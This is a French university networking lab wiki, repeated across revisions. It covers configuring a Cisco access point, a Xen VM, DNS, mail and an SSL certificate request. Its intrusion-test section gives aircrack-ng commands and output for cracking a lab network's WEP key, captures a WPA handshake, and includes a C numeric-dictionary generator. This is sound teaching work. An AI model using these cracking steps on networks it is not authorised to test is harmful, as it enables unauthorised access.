root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>c) Cassage d'une cles WPA</h2><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23125
TP sysres IMA2a5 2015/2016 G3
2015-11-22T17:25:16Z
<p>Mstrunc : </p>
<hr />
<div>Projet Système & Réseaux IMA2A S9 <br />
<br /><br />
<h1>Partie I - Configuration du point d’accès</h1><br />
<br />
<h2>a) Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3> 1) Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3> 1) Configuration du Wifi sur l'eeePC </h3><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<br />
<h2>a) Préparation </h2><br />
- Instalation aircrack-ng<br />
<pre><br />
<br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h4>c) Cassage d'une cles WPA</h4><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23124
TP sysres IMA2a5 2015/2016 G3
2015-11-22T17:19:44Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation des systèmes d'exploitation </h2><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie III - Services Internet </h2><br />
<br />
<h4>Serveur DNS</h4><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h4>Recuperation du certificat SSL</h4><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
